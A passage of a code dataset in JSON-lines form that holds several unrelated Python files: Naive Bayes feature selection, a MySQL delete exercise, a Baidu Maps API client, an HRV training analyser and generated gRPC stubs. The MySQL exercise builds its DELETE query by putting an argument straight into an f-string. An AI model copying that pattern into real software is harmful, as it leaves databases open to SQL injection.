selected and removes one feature \n at each step. If the performance is better, then keep it. 
\n Otherwise, drop it.\n \n \"\"\"\n # Initialize \n final_features = []\n best_metric = 0\n best_evaluation = None\n \n # Shuffle features and make them have a random order\n if random_select:\n random_indices = random.sample(range(len(feature_list)-1), \n len(feature_list)-1)\n feature_list = [feature_list[i] for i in random_indices]\n \n # Forward Method\n if method == 'forward':\n for feature in feature_list:\n # Add one feature at each step\n final_features.append(feature)\n # Training model and compute some performance metrics \n self.train(final_features)\n results = self.test()\n evaluation = self.evaluate(results) \n \n # Set a metric to evaluate performance\n metric_v = float(evaluation.loc[self.class_dict[class_index], metric])\n \n # Determine if we should drop the feature based on the metric\n if metric_v > best_metric:\n best_metric = metric_v\n best_evaluation = evaluation\n \n else:\n final_features.remove(feature)\n \n # Show the selection process and print results at each round\n # The default is True\n if show_process == True:\n print(best_metric)\n print(final_features)\n \n # If the number of features achieve the maximum number,\n # then the selection process will stop\n # The default is at most 10 features\n if len(final_features) == max_features:\n break\n \n # Backward Method\n elif method == 'backward':\n \n # Begin with all the features selected\n final_features = feature_list\n \n # Remove one feature at each step\n for i in range(len(feature_list)): \n if i != 0:\n # Select the first one feature as a test word \n test_word = final_features[0]\n # Remove the test word\n final_features.remove(test_word)\n \n # Training model and compute some performance metrics \n self.train(final_features)\n results = self.test()\n evaluation = self.evaluate(results) \n \n # Determine if we should drop the feature \n # based on the metric we define in the function\n metric_v = float(evaluation.loc[self.class_dict[class_index], metric])\n \n \n if metric_v >= best_metric:\n best_metric = metric_v\n best_evaluation = evaluation\n \n else:\n final_features.append(test_word)\n \n # Determine if we need to print results at each round\n # The default is True \n if show_process == True:\n print(best_metric)\n print(final_features)\n \n # If the number of features achieve the minimum number,\n # then the selection process will stop\n # The default is at least 10 features\n if len(final_features) == min_features:\n break\n \n # Save the best model through training again\n self.train(final_features)\n results = self.test()\n evaluation = self.evaluate(results) \n\n \n # Decide whether the program print results or not. 
\n        # The default is True\n        if print_mode:\n            print('------- The Number of Final Features -------\\n')\n            print(str(len(final_features)) + '\\n')\n            print('------- Features with the Best Performance -------\\n')\n            print(', '.join(final_features) + '\\n')\n            print('------- The Best Performance of the Model -------\\n')\n            print(best_evaluation) \n        \n        \n        return final_features, best_evaluation\n        \n\n\n", "sub_path": "nlp/sentiment analysis/Naive Bayes Algorithm/NaiveBayesDF.py", "file_name": "NaiveBayesDF.py", "file_ext": "py", "file_size_in_byte": 14647, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.chdir", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.c_", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.c_", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 186, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 227, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 254, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 258, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 293, "usage_type": "call"}]} +{"seq_id": "648642600", "text": "# Implement the borrar_persona function, which deletes a record from the Persona table.\n# Returns a boolean indicating whether the record was found and deleted or not.\n\nimport datetime\n\nfrom ejercicio_01 import reset_tabla, mysql, mydb, mycursor\nfrom ejercicio_02 import agregar_persona\n\n\ndef borrar_persona(id_persona):\n    try:\n        mycursor = mydb.cursor()\n        mycursor.execute(f\"DELETE FROM `persona` WHERE `persona`.`IdPersona` = {id_persona}\")\n        mydb.commit()\n        if(mycursor.rowcount > 0):\n            return True\n        return False\n    except mysql.connector.Error as error:\n        print(f\"Error deleting the person with id {id_persona}: {error}\")\n        return False\n    finally:\n        if (mydb.is_connected()):\n            mycursor.close()\n        pass\n\n\n@reset_tabla\n
def pruebas():\n    assert borrar_persona(agregar_persona('juan perez', datetime.datetime(1988, 5, 15), 32165498, 180))\n    assert borrar_persona(12345) is False\n\nif __name__ == '__main__':\n    pruebas()\n", "sub_path": "practico_03/ejercicio_03.py", "file_name": "ejercicio_03.py", "file_ext": "py", "file_size_in_byte": 1043, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "ejercicio_01.mycursor", "line_number": 12, "usage_type": "name"}, {"api_name": "ejercicio_01.mydb.cursor", "line_number": 12, "usage_type": "call"}, {"api_name": "ejercicio_01.mydb", "line_number": 12, "usage_type": "name"}, {"api_name": "ejercicio_01.mycursor.execute", "line_number": 13, "usage_type": "call"}, {"api_name": "ejercicio_01.mycursor", "line_number": 13, "usage_type": "name"}, {"api_name": "ejercicio_01.mydb.commit", "line_number": 14, "usage_type": "call"}, {"api_name": "ejercicio_01.mydb", "line_number": 14, "usage_type": "name"}, {"api_name": "ejercicio_01.mycursor.rowcount", "line_number": 15, "usage_type": "attribute"}, {"api_name": "ejercicio_01.mycursor", "line_number": 15, "usage_type": "name"}, {"api_name": "ejercicio_01.mysql.connector", "line_number": 18, "usage_type": "attribute"}, {"api_name": "ejercicio_01.mysql", "line_number": 18, "usage_type": "name"}, {"api_name": "ejercicio_01.mydb.is_connected", "line_number": 22, "usage_type": "call"}, {"api_name": "ejercicio_01.mydb", "line_number": 22, "usage_type": "name"}, {"api_name": "ejercicio_01.mycursor.close", "line_number": 23, "usage_type": "call"}, {"api_name": "ejercicio_01.mycursor", "line_number": 23, "usage_type": "name"}, {"api_name": "ejercicio_02.agregar_persona", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "call"}, {"api_name": "ejercicio_01.reset_tabla", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "638424962", "text": "# -*- coding: utf-8 -*-\n__author__ = 'zhangjinjie'\n\nimport requests\nimport json\nimport logging\n\n\nclass PlaceApi(object):\n    u\"\"\"\n    search poi data by keyword.\n    \"\"\"\n    search_url = 'http://api.map.baidu.com/place/v2/search'\n    detail_url = 'http://api.map.baidu.com/place/v2/detail'\n    eventsearch_url = 'http://api.map.baidu.com/place/v2/eventsearch'\n    eventdetail_url = 'http://api.map.baidu.com/place/v2/eventdetail'\n\n    def __init__(self, scheduler):\n        self.scheduler = scheduler\n\n    def get_place_by_page(self, query, region, **kwargs):\n        u\"\"\"\n        城市内检索\n\n        百度在没有查找到对应查询请求时, 会返回在其它城市查找到的结果, 返回格式为[{'num': , 'name': ''} ...]这样的数组\n        获取一页query相关地理信息\n        :param query: 查询关键词\n        :param region: 地区\n        :param kwargs:\n        :return: if success return\n        {\n            status: 本次API访问状态, 成功返回0, 其他返回其他数字,\n            message: 对本次API访问状态值的英文说明, 如果成功返回'ok', 失败返回错误说明,\n            total: 检索总数, 用户请求中设置了page_num字段时才会出现, 当检索总数超过760时, 多次刷新同一请求得到的total值, 可能稍有不同\n            results: [\n                {\n                    name: POI名称,\n                    location: {\n                        lat: 纬度,\n                        lng: 经度\n                    },\n                    address: POI地址信息,\n                    telephone: POI电话信息,\n                    uid: POI的唯一标识,\n                    detail_info: { # POI扩展信息, 仅当scope=2时, 显示该字段, 不同POI类型, 显示的detail_info字段不同\n                        distance: 距离中心点距离,\n                        type: POI类型,\n                        tag: 标签,\n                        detail_url: POI的详情页,\n                        price: POI商户的价格,\n                        shop_hours: 营业时间,\n                        overall_rating: 总体评分,\n                        taste_rating: 口味评分,\n                        service_rating: 服务评分,\n                        environment_rating: 环境评分,\n                        facility_rating: 星级评分,\n                        hygiene_rating: 卫生评分,\n                        technology_rating: 技术评分,\n                        image_num: 图片数,\n                        
groupon_num: 团购数,\n discount_num: 优惠数,\n comment_num: 评论数,\n favorite_num: 收藏数,\n checkin_num: 签到数\n }\n }\n ...\n ]\n }\n else return None.\n \"\"\"\n tag = kwargs.get('tag', '')\n scope = kwargs.get('scope', 1) # 检索结果详细成都, 1 基本信息, 2 POI详细信息\n # filter字段设置, scope为2时有效\n industry_type = kwargs.get('industry_type', 'cater') # 行业类型. 取值范围为: hotel 宾馆, cater 餐饮, life 生活娱乐\n # 排序字段. industry_type为hotel时, 取指范围为: default 默认, price 价格, total_score 好评, level: 星级,\n # health_score: 卫生, distance: 距离; 为cater时, default: 默认, taste_rating: 口味, price: 价格,\n # overall_rating: 好评, service_rating: 服务, distance: 距离; 为life时, default: 默认, price: 价格,\n # overall_rating: 好评, comment_num: 服务, distance: 距离\n sort_name = kwargs.get('sort_name', 'default')\n sort_rule = kwargs.get('sort_rule', 0) # 排序规则, 0 从高到低, 1 从低到高\n groupon = kwargs.get('groupon', 1) # 是否有团购, 1 有团购, 0 无团购\n discount = kwargs.get('discount', 1) # 是否有打折, 1 有打折, 0 无打折\n page_size = kwargs.get('page_size', 20) # 每页数据记录数. 最大返回20条\n page_num = kwargs.get('page_num', 0) # 页序号\n params = {'query': query, 'output': 'json', 'scope': scope, 'page_size': page_size, 'page_num': page_num,\n 'ak': self.scheduler.next()}\n if scope == 2:\n filter = 'industry_type:{industry_type}|sort_name:{sort_name}|sort_rule:{sort_rule}|groupon:{groupon}|' \\\n 'discount:{discount}'.format(industry_type=industry_type, sort_name=sort_name,\n sort_rule=sort_rule, groupon=groupon, discount=discount)\n params['filter'] = filter\n\n if tag:\n params['tag'] = tag\n\n params['region'] = region\n r = requests.get(self.search_url, params=params)\n try:\n r.raise_for_status()\n data = json.loads(r.text)\n # print json.dumps(data, ensure_ascii=False)\n if data['status'] == 0:\n # 在状态为0时, 也有可能没有找到搜索结果, 而是返回在其它城市查找到的结果, 返回格式为[{'num': , 'name': ''} ...]这样的数组\n if len(data['results']) > 0:\n if 'location' in data['results'][0]:\n return data\n logging.debug(data['results'])\n return None\n return data\n else:\n logging.error('failed to get place, return result is %s' % r.text)\n return None\n except Exception as e:\n logging.exception(e)\n return None\n\n def get_place_all(self, query, region, **kwargs):\n u\"\"\"\n 根据关键词query查找所有地址信息\n\n *注意* 百度最多返回400条记录\n :param query: 查询关键词\n :param region: 地区\n :param kwargs:\n :return: if success return\n [\n {\n name: POI名称,\n location: {\n lat: 纬度,\n lng: 经度\n },\n address: POI地址信息,\n telephone: POI电话信息,\n uid: POI的唯一标识,\n detail_info: { # POI扩展信息, 仅当scope=2时, 显示该字段, 不同POI类型, 显示的detail_info字段不同\n distance: 距离中心点距离,\n type: POI类型,\n tag: 标签,\n detail_url: POI的详情页,\n price: POI商户的价格,\n shop_hours: 营业时间,\n overall_rating: 总体评分,\n taste_rating: 口味评分,\n service_rating: 服务评分,\n environment_rating: 环境评分,\n facility_rating: 星级评分,\n hygiene_rating: 卫生评分,\n technology_rating: 技术评分,\n image_num: 图片数,\n groupon_num: 团购数,\n discount_num: 优惠数,\n comment_num: 评论数,\n favorite_num: 收藏数,\n checkin_num: 签到数\n }\n }\n ...\n ]\n else return []\n \"\"\"\n data = []\n kwargs.update({'page_num': 0})\n r = self.get_place_by_page(query, region, **kwargs)\n if r is None:\n return data\n data.extend(r['results'])\n total = r['total']\n page_size = kwargs.get('page_size', 20)\n # print \"total: %d, page_size: %d\" % (total, page_size)\n for i in range(1, total // page_size + 1):\n kwargs.update({'page_num': i})\n r = self.get_place_by_page(query, region, **kwargs)\n if r is None:\n break\n if r['total'] == 0:\n break\n data.extend(r['results'])\n return data\n\n def get_place_by_uids(self, uids, **kwargs):\n u\"\"\"\n Place详情检索服务\n\n uids最多支持10个\n :param uids: string or list\n 
:param kwargs: available keys include 'output', 'scope'\n :return: same with get_place_all.\n \"\"\"\n params = {}\n if isinstance(uids, list):\n params['uids'] = ','.join(uids)\n else:\n params['uid'] = uids\n params['output'] = kwargs.get('output', 'json') # json or xml 请求返回格式\n params['scope'] = kwargs.get('scope', 1) # 1 返回基本信息, 2 返回POI详细信息\n params['ak'] = self.scheduler.next()\n try:\n r = requests.get(self.detail_url, params=params)\n r.raise_for_status()\n\n data = json.loads(r.text)\n if data['status'] == 0:\n return data['result']\n\n logging.error('failed to get place, return result is %s' % r.text)\n return []\n except Exception as e:\n logging.exception(e)\n return []\n", "sub_path": "build/lib/mapapi/baidu/place_api.py", "file_name": "place_api.py", "file_ext": "py", "file_size_in_byte": 9362, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 98, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 101, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 108, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 112, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 115, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 200, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 203, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 207, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 210, "usage_type": "call"}]} +{"seq_id": "363442748", "text": "from common.analyse import stupid_time_analysis, simple_filter, get_lomb_spectrum, get_cwt_spectrum, get_fft_spectrum, find_start_point\nfrom common.visualization import show_stupid_time_analysis, show_power_frequency\nfrom common.parsers import save_hr_to_csv, save_spectrum_power_to_csv\nfrom common.routines import get_data_path\nfrom multiprocessing import Process\n\n\nclass TrainingAnalyser(Process):\n def __init__(self, training_hash, analyse_settings, athlete_name=None, date=None, activity=None, max_size=None, value=None, return_info=None):\n Process.__init__(self)\n self.training_hash = training_hash\n self.athlete_name = athlete_name\n self.date = date\n self.activity = activity\n self.max_size = max_size\n self.value = value\n self.analyse_settings = analyse_settings\n self.return_info = return_info\n self.save_images = self.analyse_settings['save_images']\n self.show_images = False\n\n def run(self):\n if self.analyse_settings is None or type(self.analyse_settings) != dict:\n return\n\n spectrum_power_dict = None\n\n if 'pre-processing' in self.analyse_settings:\n if 'No filter' in self.analyse_settings['pre-processing']['filter']:\n pass\n elif 'Filter' in self.analyse_settings['pre-processing']['filter']:\n self.training_hash = simple_filter(self.training_hash, self.athlete_name, self.date, self.activity,\n self.show_images, self.save_images)\n\n if 'analyse' in self.analyse_settings:\n if 'time' in self.analyse_settings['analyse']:\n return_info = stupid_time_analysis(self.training_hash)\n self.return_info.append(['Time Analysis',\n show_stupid_time_analysis(return_info, self.athlete_name, self.date, self.activity,\n self.show_images, self.save_images)])\n\n if 'spectrum' in self.analyse_settings['analyse']:\n spectrum_functions = dict()\n if 'fft' in self.analyse_settings['analyse']:\n spectrum_functions['fft'] = get_fft_spectrum\n if 'lomb' in self.analyse_settings['analyse']:\n 
spectrum_functions['lomb'] = get_lomb_spectrum\n\n                sec_interval = 100\n                sec_change_step = 10\n                assert type(self.training_hash) is dict\n                time_values = [float(x) for x in sorted(self.training_hash.keys())]\n                time_values = sorted(time_values)\n\n                if 'wavelet' in self.analyse_settings['analyse']:\n                    self.return_info.append(['Spectrum wavelet Analysis', get_cwt_spectrum(\n                        self.training_hash, time_values[0:len(time_values)], self.athlete_name, self.date,\n                        self.activity, self.show_images, self.save_images)])\n\n                    del self.analyse_settings['analyse']['wavelet']\n\n                frequency_method = dict()\n\n                for key in spectrum_functions.keys():\n                    spectrum_functions[key](self.training_hash, time_values[0:len(time_values)], self.athlete_name,\n                                            self.date, self.activity, self.show_images, self.save_images)\n\n                count = 0\n                last_start_point = 0\n                last_end_point = 0\n                for i in range(0, int(max(time_values) / sec_change_step) + 1):\n                    start_point = find_start_point(time_values, i * sec_change_step, last_start_point)\n                    last_start_point = start_point\n                    end_point = find_start_point(time_values, i * sec_change_step + sec_interval, last_end_point, True)\n                    last_end_point = end_point\n                    count += 1\n                    if end_point == len(time_values) - 1:\n                        break\n\n                if self.max_size is not None:\n                    self.max_size.value = count\n                last_start_point = 0\n                last_end_point = 0\n                for i in range(0, int(max(time_values) / sec_change_step) + 1):\n                    start_point = find_start_point(time_values, i * sec_change_step, last_start_point)\n                    last_start_point = start_point\n                    end_point = find_start_point(time_values, i * sec_change_step + sec_interval, last_end_point, True)\n                    last_end_point = end_point\n                    for key in spectrum_functions.keys():\n                        if key not in frequency_method:\n                            frequency_method[key] = []\n                        frequency_method[key].append(\n                            spectrum_functions[key](self.training_hash, time_values[start_point:end_point],\n                                                    self.athlete_name, self.date, self.activity, self.show_images,\n                                                    self.save_images))\n\n                    if self.value is not None:\n                        self.value.value = i\n                    if end_point == len(time_values) - 1:\n                        break\n\n                for key in frequency_method.keys():\n                    lfl = [x[0] for x in frequency_method[key]]\n                    hfl = [x[1] for x in frequency_method[key]]\n                    tpl = [x[2] for x in frequency_method[key]]\n                    vlf = [x[3] for x in frequency_method[key]]\n                    vhf = [x[4] for x in frequency_method[key]]\n                    hf2lf = []\n                    for x in frequency_method[key]:\n                        if x[0] != 0:\n                            hf2lf.append(x[1] / x[0])\n                        else:\n                            hf2lf.append(0)\n                    if spectrum_power_dict is None:\n                        spectrum_power_dict = dict()\n                    spectrum_power_dict[key] = [lfl, hfl, tpl, vlf, vhf, hf2lf]\n                    self.return_info.append(['Spectrum ' + key + ' Analysis', show_power_frequency(\n                        [key, lfl, hfl, tpl, vlf, vhf, hf2lf], self.athlete_name, self.date, self.activity,\n                        self.show_images, self.save_images)])\n\n        if self.analyse_settings['save_csv']:\n            self.generate_csv(spectrum_power_dict)\n\n        self.value.value = -1\n\n    def generate_csv(self, spectrum_power_dict):\n        data_path = get_data_path(athlete=self.athlete_name, date=self.date, activity=self.activity)\n        save_hr_to_csv(data_path + 'hrv_hb_info.csv', self.training_hash)\n        if spectrum_power_dict is not None:\n            assert type(spectrum_power_dict) is dict\n            for key in spectrum_power_dict.keys():\n                save_spectrum_power_to_csv(data_path + 'spectrum_data_' + key + '.csv', spectrum_power_dict[key])", "sub_path": "wrappers/analyser.py", "file_name": "analyser.py", "file_ext": "py", "file_size_in_byte": 6926, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": 
[{"api_name": "multiprocessing.Process", "line_number": 8, "usage_type": "name"}, {"api_name": "multiprocessing.Process.__init__", "line_number": 10, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 10, "usage_type": "name"}, {"api_name": "common.analyse.simple_filter", "line_number": 32, "usage_type": "call"}, {"api_name": "common.analyse.stupid_time_analysis", "line_number": 37, "usage_type": "call"}, {"api_name": "common.visualization.show_stupid_time_analysis", "line_number": 39, "usage_type": "call"}, {"api_name": "common.analyse.get_fft_spectrum", "line_number": 45, "usage_type": "name"}, {"api_name": "common.analyse.get_lomb_spectrum", "line_number": 47, "usage_type": "name"}, {"api_name": "common.analyse.get_cwt_spectrum", "line_number": 56, "usage_type": "call"}, {"api_name": "common.analyse.find_start_point", "line_number": 72, "usage_type": "call"}, {"api_name": "common.analyse.find_start_point", "line_number": 74, "usage_type": "call"}, {"api_name": "common.analyse.find_start_point", "line_number": 85, "usage_type": "call"}, {"api_name": "common.analyse.find_start_point", "line_number": 87, "usage_type": "call"}, {"api_name": "common.visualization.show_power_frequency", "line_number": 117, "usage_type": "call"}, {"api_name": "common.routines.get_data_path", "line_number": 127, "usage_type": "call"}, {"api_name": "common.parsers.save_hr_to_csv", "line_number": 128, "usage_type": "call"}, {"api_name": "common.parsers.save_spectrum_power_to_csv", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "437056160", "text": "#!/usr/bin/python\n#\n# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Generated by the gRPC Python protocol compiler plugin. 
DO NOT EDIT!\n\"\"\"Client and server classes corresponding to protobuf-defined services.\"\"\"\nimport grpc\n\nimport demo_pb2 as demo__pb2\n\n\nclass CartServiceStub(object):\n \"\"\"-----------------Cart service-----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.AddItem = channel.unary_unary(\n '/hipstershop.CartService/AddItem',\n request_serializer=demo__pb2.AddItemRequest.SerializeToString,\n response_deserializer=demo__pb2.Empty.FromString,\n )\n self.GetCart = channel.unary_unary(\n '/hipstershop.CartService/GetCart',\n request_serializer=demo__pb2.GetCartRequest.SerializeToString,\n response_deserializer=demo__pb2.Cart.FromString,\n )\n self.EmptyCart = channel.unary_unary(\n '/hipstershop.CartService/EmptyCart',\n request_serializer=demo__pb2.EmptyCartRequest.SerializeToString,\n response_deserializer=demo__pb2.Empty.FromString,\n )\n\n\nclass CartServiceServicer(object):\n \"\"\"-----------------Cart service-----------------\n\n \"\"\"\n\n def AddItem(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def GetCart(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def EmptyCart(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_CartServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'AddItem': grpc.unary_unary_rpc_method_handler(\n servicer.AddItem,\n request_deserializer=demo__pb2.AddItemRequest.FromString,\n response_serializer=demo__pb2.Empty.SerializeToString,\n ),\n 'GetCart': grpc.unary_unary_rpc_method_handler(\n servicer.GetCart,\n request_deserializer=demo__pb2.GetCartRequest.FromString,\n response_serializer=demo__pb2.Cart.SerializeToString,\n ),\n 'EmptyCart': grpc.unary_unary_rpc_method_handler(\n servicer.EmptyCart,\n request_deserializer=demo__pb2.EmptyCartRequest.FromString,\n response_serializer=demo__pb2.Empty.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.CartService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass CartService(object):\n \"\"\"-----------------Cart service-----------------\n\n \"\"\"\n\n @staticmethod\n def AddItem(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CartService/AddItem',\n demo__pb2.AddItemRequest.SerializeToString,\n demo__pb2.Empty.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def GetCart(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return 
grpc.experimental.unary_unary(request, target, '/hipstershop.CartService/GetCart',\n demo__pb2.GetCartRequest.SerializeToString,\n demo__pb2.Cart.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def EmptyCart(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CartService/EmptyCart',\n demo__pb2.EmptyCartRequest.SerializeToString,\n demo__pb2.Empty.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass RecommendationServiceStub(object):\n \"\"\"---------------Recommendation service----------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.ListRecommendations = channel.unary_unary(\n '/hipstershop.RecommendationService/ListRecommendations',\n request_serializer=demo__pb2.ListRecommendationsRequest.SerializeToString,\n response_deserializer=demo__pb2.ListRecommendationsResponse.FromString,\n )\n\n\nclass RecommendationServiceServicer(object):\n \"\"\"---------------Recommendation service----------\n\n \"\"\"\n\n def ListRecommendations(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_RecommendationServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'ListRecommendations': grpc.unary_unary_rpc_method_handler(\n servicer.ListRecommendations,\n request_deserializer=demo__pb2.ListRecommendationsRequest.FromString,\n response_serializer=demo__pb2.ListRecommendationsResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.RecommendationService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass RecommendationService(object):\n \"\"\"---------------Recommendation service----------\n\n \"\"\"\n\n @staticmethod\n def ListRecommendations(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.RecommendationService/ListRecommendations',\n demo__pb2.ListRecommendationsRequest.SerializeToString,\n demo__pb2.ListRecommendationsResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass ProductCatalogServiceStub(object):\n \"\"\"---------------Product Catalog----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.ListProducts = channel.unary_unary(\n '/hipstershop.ProductCatalogService/ListProducts',\n request_serializer=demo__pb2.Empty.SerializeToString,\n response_deserializer=demo__pb2.ListProductsResponse.FromString,\n )\n self.GetProduct = channel.unary_unary(\n '/hipstershop.ProductCatalogService/GetProduct',\n request_serializer=demo__pb2.GetProductRequest.SerializeToString,\n response_deserializer=demo__pb2.Product.FromString,\n )\n self.SearchProducts = 
channel.unary_unary(\n '/hipstershop.ProductCatalogService/SearchProducts',\n request_serializer=demo__pb2.SearchProductsRequest.SerializeToString,\n response_deserializer=demo__pb2.SearchProductsResponse.FromString,\n )\n\n\nclass ProductCatalogServiceServicer(object):\n \"\"\"---------------Product Catalog----------------\n\n \"\"\"\n\n def ListProducts(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def GetProduct(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def SearchProducts(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_ProductCatalogServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'ListProducts': grpc.unary_unary_rpc_method_handler(\n servicer.ListProducts,\n request_deserializer=demo__pb2.Empty.FromString,\n response_serializer=demo__pb2.ListProductsResponse.SerializeToString,\n ),\n 'GetProduct': grpc.unary_unary_rpc_method_handler(\n servicer.GetProduct,\n request_deserializer=demo__pb2.GetProductRequest.FromString,\n response_serializer=demo__pb2.Product.SerializeToString,\n ),\n 'SearchProducts': grpc.unary_unary_rpc_method_handler(\n servicer.SearchProducts,\n request_deserializer=demo__pb2.SearchProductsRequest.FromString,\n response_serializer=demo__pb2.SearchProductsResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.ProductCatalogService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass ProductCatalogService(object):\n \"\"\"---------------Product Catalog----------------\n\n \"\"\"\n\n @staticmethod\n def ListProducts(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.ProductCatalogService/ListProducts',\n 